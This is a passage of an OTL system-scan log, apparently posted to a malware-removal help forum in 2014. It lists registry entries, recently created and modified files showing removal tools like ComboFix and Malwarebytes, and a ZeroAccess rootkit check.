O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{81D07DDC-4245-4ED1-AB63-209670737883}: DhcpNameServer = 10.14.0.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{D75AA527-005C-4D5C-8F2A-E2A78107EAEF}: DhcpNameServer = 192.168.200.1
O18:64bit: - Protocol\Handler\livecall - No CLSID value found
O18:64bit: - Protocol\Handler\ms-help - No CLSID value found
O18:64bit: - Protocol\Handler\msnim - No CLSID value found
O18:64bit: - Protocol\Handler\wlmailhtml - No CLSID value found
O18:64bit: - Protocol\Handler\wlpg - No CLSID value found
O20:64bit: - AppInit_DLLs: (C:\Windows\System32\nvinitx.dll) - C:\Windows\SysNative\nvinitx.dll (NVIDIA Corporation)
O20 - AppInit_DLLs: (C:\Windows\SysWOW64\nvinit.dll) - C:\Windows\SysWOW64\nvinit.dll (NVIDIA Corporation)
O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)
O20:64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O34 - HKLM BootExecute: (autocheck autochk *)
O35:64bit: - HKLM\..comfile [open] -- "%1" %*
O35:64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:64bit: - HKLM\...com [@ = ComFile] -- "%1" %*
O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = ComFile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
CREATERESTOREPOINT
Restore point Set: OTL Restore Point
========== Files/Folders - Created Within 30 Days ==========
[2014/11/08 20:57:50 | 000,000,000 | R--D | C] -- C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BT Devices
[2014/11/08 17:30:12 | 000,000,000 | ---D | C] -- C:\Users\Ryan\AppData\Local\{8491446D-F948-4B19-B521-2509828BF009}
[2014/11/08 14:48:11 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\Ryan\Desktop\OTL.exe
[2014/11/08 13:00:58 | 000,000,000 | ---D | C] -- C:\Users\Ryan\Desktop\FRST-OlderVersion
[2014/11/07 18:24:41 | 000,000,000 | ---D | C] -- C:\ProgramData\Malwarebytes' Anti-Malware (portable)
[2014/11/07 18:22:56 | 000,000,000 | ---D | C] -- C:\Users\Ryan\Desktop\mbar
[2014/11/07 18:13:16 | 014,439,144 | ---- | C] (Malwarebytes Corp.) -- C:\Users\Ryan\Desktop\mbar-1.08.0.1001.exe
[2014/11/07 15:57:55 | 000,186,568 | ---- | C] (ESET) -- C:\Users\Ryan\Desktop\ESETPoweliksCleaner.exe
[2014/11/07 15:57:05 | 004,184,008 | ---- | C] (Kaspersky Lab ZAO) -- C:\Users\Ryan\Desktop\tdsskiller.exe
[2014/11/03 20:24:59 | 000,000,000 | ---D | C] -- C:\Users\Ryan\AppData\Local\{9B1BF085-634B-426D-BDB3-489C0053B60E}
[2014/11/03 18:26:34 | 001,706,359 | ---- | C] (Thisisu) -- C:\Users\Ryan\Desktop\JRT.exe
[2014/11/03 18:20:57 | 000,000,000 | ---D | C] -- C:\AdwCleaner
[2014/11/03 18:14:25 | 000,000,000 | ---D | C] -- C:\ProgramData\RogueKiller
[2014/11/03 15:20:29 | 000,000,000 | -HSD | C] -- C:\$RECYCLE.BIN
[2014/11/03 15:20:27 | 000,000,000 | ---D | C] -- C:\Windows\temp
[2014/11/03 15:11:20 | 000,518,144 | ---- | C] (SteelWerX) -- C:\Windows\SWREG.exe
[2014/11/03 15:11:20 | 000,406,528 | ---- | C] (SteelWerX) -- C:\Windows\SWSC.exe
[2014/11/03 15:11:20 | 000,060,416 | ---- | C] (NirSoft) -- C:\Windows\NIRCMD.exe
[2014/11/03 15:09:31 | 000,000,000 | ---D | C] -- C:\Qoobox
[2014/11/03 15:09:15 | 000,000,000 | ---D | C] -- C:\Windows\erdnt
[2014/11/03 15:08:40 | 005,591,672 | R--- | C] (Swearware) -- C:\Users\Ryan\Desktop\ComboFix.exe
[2014/11/02 22:25:00 | 005,192,704 | ---- | C] (AVAST Software) -- C:\Users\Ryan\Desktop\aswMBR.exe
[2014/11/02 22:18:14 | 000,000,000 | ---D | C] -- C:\FRST
[2014/11/02 22:17:28 | 002,115,584 | ---- | C] (Farbar) -- C:\Users\Ryan\Desktop\FRST64.exe
[2014/10/30 20:53:23 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT
[2014/10/30 00:28:49 | 000,000,000 | ---D | C] -- C:\RegBackup
[2014/10/30 00:27:53 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
[2014/10/30 00:27:45 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Tweaking.com
[2014/10/29 18:45:59 | 000,000,000 | ---D | C] -- C:\Users\Ryan\AppData\Roaming\Mozilla
[2014/10/15 15:38:39 | 000,272,808 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\javaws.exe
[2014/10/15 15:38:34 | 000,175,528 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\javaw.exe
[2014/10/15 15:38:34 | 000,175,528 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\java.exe
[2014/10/15 15:38:34 | 000,098,216 | ---- | C] (Oracle Corporation) -- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
[2014/10/15 15:38:34 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
[2014/10/15 15:38:26 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Java
[2014/10/14 19:39:38 | 000,000,000 | ---D | C] -- C:\Users\Ryan\Desktop\masque of red death
[2014/10/14 15:21:20 | 001,943,696 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dfshim.dll
[2014/10/14 15:21:20 | 001,131,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dfshim.dll
[2014/10/14 15:21:20 | 000,156,824 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mscorier.dll
[2014/10/14 15:21:20 | 000,156,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mscorier.dll
[2014/10/14 15:21:20 | 000,073,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mscories.dll
[2014/10/14 15:21:19 | 000,081,560 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mscories.dll
[2014/10/14 15:21:05 | 005,552,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ntoskrnl.exe
[2014/10/14 15:21:05 | 001,202,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drmv2clt.dll
[2014/10/14 15:21:05 | 000,988,160 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\drmv2clt.dll
[2014/10/14 15:21:05 | 000,842,240 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\blackbox.dll
[2014/10/14 15:21:05 | 000,744,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\blackbox.dll
[2014/10/14 15:21:04 | 014,632,960 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wmp.dll
[2014/10/14 15:21:03 | 004,120,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mf.dll
[2014/10/14 15:21:02 | 000,782,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wmdrmsdk.dll
[2014/10/14 15:21:02 | 000,617,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wmdrmsdk.dll
[2014/10/14 15:21:01 | 003,919,288 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntoskrnl.exe
[2014/10/14 15:21:00 | 003,975,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ntkrnlpa.exe
[2014/10/14 15:21:00 | 000,500,224 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\AUDIOKSE.dll
[2014/10/14 15:20:57 | 011,411,456 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wmp.dll
[2014/10/14 15:20:54 | 003,208,704 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mf.dll
[2014/10/14 15:20:54 | 000,693,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winload.efi
[2014/10/14 15:20:54 | 000,617,376 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winresume.efi
[2014/10/14 15:20:54 | 000,497,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\drmmgrtn.dll
[2014/10/14 15:20:54 | 000,457,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ci.dll
[2014/10/14 15:20:54 | 000,442,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\AUDIOKSE.dll
[2014/10/14 15:20:54 | 000,406,016 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\drmmgrtn.dll
[2014/10/14 15:20:53 | 001,574,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\quartz.dll
[2014/10/14 15:20:53 | 000,619,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winload.exe
[2014/10/14 15:20:53 | 000,440,832 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\AudioEng.dll
[2014/10/14 15:20:52 | 000,533,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winresume.exe
[2014/10/14 15:20:51 | 000,229,376 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wintrust.dll
[2014/10/14 15:20:50 | 000,631,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\evr.dll
[2014/10/14 15:20:48 | 001,480,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\crypt32.dll
[2014/10/14 15:20:48 | 000,284,672 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\EncDump.dll
[2014/10/14 15:20:47 | 001,069,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cryptui.dll
[2014/10/14 15:20:47 | 000,489,984 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\evr.dll
[2014/10/14 15:20:47 | 000,296,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\AudioSes.dll
[2014/10/14 15:20:46 | 001,329,664 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\quartz.dll
[2014/10/14 15:20:46 | 000,432,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mfplat.dll
[2014/10/14 15:20:45 | 001,005,056 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\cryptui.dll
[2014/10/14 15:20:45 | 000,641,024 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msscp.dll
[2014/10/14 15:20:45 | 000,503,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\srcore.dll
[2014/10/14 15:20:45 | 000,354,816 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mfplat.dll
[2014/10/14 15:20:45 | 000,082,432 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\cryptsp.dll
[2014/10/14 15:20:44 | 000,504,320 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msscp.dll
[2014/10/14 15:20:44 | 000,325,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msnetobj.dll
[2014/10/14 15:20:44 | 000,126,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\audiodg.exe
[2014/10/14 15:20:44 | 000,058,880 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\appidapi.dll
[2014/10/14 15:20:43 | 000,265,216 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msnetobj.dll
[2014/10/14 15:20:43 | 000,206,848 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mfps.dll
[2014/10/14 15:20:43 | 000,103,424 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mfps.dll
[2014/10/14 15:20:43 | 000,055,808 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rrinstaller.exe
[2014/10/14 15:20:43 | 000,050,688 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\appidapi.dll
[2014/10/14 15:20:43 | 000,050,176 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\rrinstaller.exe
[2014/10/14 15:20:42 | 000,063,488 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\setbcdlocale.dll
[2014/10/14 15:20:42 | 000,024,576 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mfpmp.exe
[2014/10/14 15:20:41 | 012,625,920 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\wmploc.DLL
[2014/10/14 15:20:41 | 012,625,408 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\wmploc.DLL
[2014/10/14 15:20:41 | 000,023,040 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mfpmp.exe
[2014/10/14 15:20:41 | 000,009,728 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\spwmp.dll
[2014/10/14 15:20:41 | 000,008,192 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\spwmp.dll
[2014/10/14 15:20:41 | 000,005,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msdxm.ocx
[2014/10/14 15:20:41 | 000,005,120 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxmasf.dll
[2014/10/14 15:20:41 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msdxm.ocx
[2014/10/14 15:20:41 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\dxmasf.dll
[2014/10/14 15:20:41 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mferror.dll
[2014/10/14 15:20:41 | 000,002,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mferror.dll
[2014/10/14 15:20:34 | 000,276,480 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\generaltel.dll
[2014/10/14 15:20:31 | 000,507,392 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
[2014/10/14 15:20:29 | 000,597,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\jscript9diag.dll
[2014/10/14 15:20:29 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\aeinv.dll
[2014/10/14 15:20:29 | 000,069,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmled.dll
[2014/10/14 15:20:29 | 000,051,200 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieetwproxystub.dll
[2014/10/14 15:20:29 | 000,032,768 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iernonce.dll
[2014/10/14 15:20:28 | 000,710,656 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ie4uinit.exe
[2014/10/14 15:20:28 | 000,033,792 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iernonce.dll
[2014/10/14 15:20:26 | 000,060,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
[2014/10/14 15:20:26 | 000,048,640 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwproxystub.dll
[2014/10/14 15:20:21 | 000,072,704 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\JavaScriptCollectionAgent.dll
[2014/10/14 15:20:14 | 002,017,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\inetcpl.cpl
[2014/10/14 15:20:14 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\iesetup.dll
[2014/10/14 15:20:14 | 000,004,096 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollectorres.dll
[2014/10/14 15:20:12 | 000,731,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msfeeds.dll
[2014/10/14 15:20:12 | 000,446,464 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtmsft.dll
[2014/10/14 15:20:12 | 000,440,320 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieui.dll
[2014/10/14 15:20:12 | 000,111,616 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieetwcollector.exe
[2014/10/14 15:20:11 | 002,108,416 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\inetcpl.cpl
[2014/10/14 15:20:11 | 000,066,048 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\iesetup.dll
[2014/10/14 15:20:08 | 001,068,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mshtmlmedia.dll
[2014/10/14 15:19:59 | 000,112,128 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieUnatt.exe
[2014/10/14 15:19:54 | 000,678,400 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\ieapfltr.dll
[2014/10/14 15:19:48 | 000,164,864 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\msrating.dll
[2014/10/14 15:19:48 | 000,061,952 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\MshtmlDac.dll
[2014/10/14 15:19:40 | 000,289,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\dxtrans.dll
[2014/10/14 15:19:38 | 000,595,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieui.dll
[2014/10/14 15:19:29 | 001,249,280 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmlmedia.dll
[2014/10/14 15:19:29 | 000,085,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mshtmled.dll
[2014/10/14 15:19:27 | 005,829,632 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9.dll
[2014/10/14 15:19:27 | 000,758,272 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\jscript9diag.dll
[2014/10/14 15:19:27 | 000,139,264 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieUnatt.exe
[2014/10/14 15:19:25 | 000,547,328 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\vbscript.dll
[2014/10/14 15:19:22 | 000,775,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\ieapfltr.dll
[2014/10/14 15:19:19 | 000,083,968 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MshtmlDac.dll
[2014/10/14 15:19:16 | 000,195,584 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msrating.dll
[2014/10/14 15:19:09 | 000,940,032 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\MsSpellCheckingFacility.exe
[2014/10/14 15:18:43 | 003,241,472 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\msi.dll
[2014/10/14 15:17:58 | 000,424,448 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rastls.dll
[2014/10/14 15:17:58 | 000,372,736 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\rastls.dll
[2014/10/14 15:17:56 | 003,722,240 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mstscax.dll
[2014/10/14 15:17:56 | 003,221,504 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mstscax.dll
[2014/10/14 15:17:55 | 001,118,720 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\mstsc.exe
[2014/10/14 15:17:55 | 001,051,136 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\mstsc.exe
[2014/10/14 15:17:55 | 000,235,520 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winsta.dll
[2014/10/14 15:17:55 | 000,150,528 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\rdpcorekmts.dll
[2014/10/14 15:17:54 | 000,455,168 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\winlogon.exe
[2014/10/14 15:17:54 | 000,131,584 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\aaclient.dll
[2014/10/14 15:17:47 | 000,077,312 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysNative\packager.dll
[2014/10/14 15:17:47 | 000,067,072 | ---- | C] (Microsoft Corporation) -- C:\Windows\SysWow64\packager.dll
ascot1340
2014-11-09, 22:53
========== Files - Modified Within 30 Days ==========
[2014/11/08 20:57:42 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/11/08 20:39:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/11/08 20:36:00 | 000,000,904 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job
[2014/11/08 17:36:00 | 000,000,852 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job
[2014/11/08 14:48:11 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\Ryan\Desktop\OTL.exe
[2014/11/08 13:09:54 | 000,027,744 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/11/08 13:09:54 | 000,027,744 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/11/08 13:05:25 | 000,701,104 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerApp.exe
[2014/11/08 13:05:25 | 000,071,344 | ---- | M] (Adobe Systems Incorporated) -- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
[2014/11/08 13:02:12 | 2064,076,799 | -HS- | M] () -- C:\hiberfil.sys
[2014/11/08 13:01:05 | 000,000,035 | ---- | M] () -- C:\Windows\SysNative\drivers\etc\hosts
[2014/11/08 13:00:58 | 002,115,584 | ---- | M] (Farbar) -- C:\Users\Ryan\Desktop\FRST64.exe
[2014/11/07 18:24:40 | 000,131,800 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\MBAMSwissArmy.sys
[2014/11/07 18:23:43 | 000,096,472 | ---- | M] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbamchameleon.sys
[2014/11/07 18:13:17 | 014,439,144 | ---- | M] (Malwarebytes Corp.) -- C:\Users\Ryan\Desktop\mbar-1.08.0.1001.exe
[2014/11/07 15:57:55 | 000,186,568 | ---- | M] (ESET) -- C:\Users\Ryan\Desktop\ESETPoweliksCleaner.exe
[2014/11/07 15:57:05 | 004,184,008 | ---- | M] (Kaspersky Lab ZAO) -- C:\Users\Ryan\Desktop\tdsskiller.exe
[2014/11/05 17:45:56 | 001,221,674 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/11/05 17:45:56 | 000,311,622 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/11/05 17:45:56 | 000,006,214 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/11/03 21:28:40 | 000,002,159 | ---- | M] () -- C:\Users\Ryan\AppData\Local\recently-used.xbel
[2014/11/03 18:26:43 | 001,706,359 | ---- | M] (Thisisu) -- C:\Users\Ryan\Desktop\JRT.exe
[2014/11/03 18:20:50 | 001,375,089 | ---- | M] () -- C:\Users\Ryan\Desktop\AdwCleaner.exe
[2014/11/03 18:14:27 | 000,034,808 | ---- | M] () -- C:\Windows\SysNative\drivers\TrueSight.sys
[2014/11/03 18:13:30 | 014,670,424 | ---- | M] () -- C:\Users\Ryan\Desktop\RogueKiller.exe
[2014/11/03 15:08:54 | 005,591,672 | R--- | M] (Swearware) -- C:\Users\Ryan\Desktop\ComboFix.exe
[2014/11/02 22:52:57 | 000,000,512 | ---- | M] () -- C:\Users\Ryan\Desktop\MBR.dat
[2014/11/02 22:26:22 | 005,192,704 | ---- | M] (AVAST Software) -- C:\Users\Ryan\Desktop\aswMBR.exe
[2014/10/30 00:30:50 | 000,000,207 | ---- | M] () -- C:\Windows\tweaking.com-regbackup-RYAN-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
[2014/10/30 00:27:54 | 000,002,246 | ---- | M] () -- C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
[2014/10/29 15:49:18 | 000,001,113 | ---- | M] () -- C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
[2014/10/15 15:38:30 | 000,098,216 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
[2014/10/15 15:38:28 | 000,272,808 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\javaws.exe
[2014/10/15 15:38:28 | 000,175,528 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\javaw.exe
[2014/10/15 15:38:28 | 000,175,528 | ---- | M] (Oracle Corporation) -- C:\Windows\SysWow64\java.exe
[2014/10/15 15:27:04 | 000,342,240 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT
[2014/10/09 21:05:59 | 000,276,480 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\generaltel.dll
[2014/10/09 21:05:42 | 000,507,392 | ---- | M] (Microsoft Corporation) -- C:\Windows\SysNative\aepdu.dll
========== Files Created - No Company Name ==========
[2014/11/03 21:28:40 | 000,002,159 | ---- | C] () -- C:\Users\Ryan\AppData\Local\recently-used.xbel
[2014/11/03 18:20:39 | 001,375,089 | ---- | C] () -- C:\Users\Ryan\Desktop\AdwCleaner.exe
[2014/11/03 18:14:27 | 000,034,808 | ---- | C] () -- C:\Windows\SysNative\drivers\TrueSight.sys
[2014/11/03 18:13:29 | 014,670,424 | ---- | C] () -- C:\Users\Ryan\Desktop\RogueKiller.exe
[2014/11/03 15:11:20 | 000,256,000 | ---- | C] () -- C:\Windows\PEV.exe
[2014/11/03 15:11:20 | 000,208,896 | ---- | C] () -- C:\Windows\MBR.exe
[2014/11/03 15:11:20 | 000,098,816 | ---- | C] () -- C:\Windows\sed.exe
[2014/11/03 15:11:20 | 000,080,412 | ---- | C] () -- C:\Windows\grep.exe
[2014/11/03 15:11:20 | 000,068,096 | ---- | C] () -- C:\Windows\zip.exe
[2014/11/02 22:52:57 | 000,000,512 | ---- | C] () -- C:\Users\Ryan\Desktop\MBR.dat
[2014/10/30 00:30:50 | 000,000,207 | ---- | C] () -- C:\Windows\tweaking.com-regbackup-RYAN-PC-Microsoft-Windows-7-Home-Premium-(64-bit).dat
[2014/10/30 00:27:54 | 000,002,246 | ---- | C] () -- C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
[2013/06/28 06:08:46 | 000,094,208 | ---- | C] () -- C:\Windows\SysWow64\ssdevm.dll
========== ZeroAccess Check ==========
[2009/07/13 23:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/06/24 21:05:42 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/06/24 20:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/13 20:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
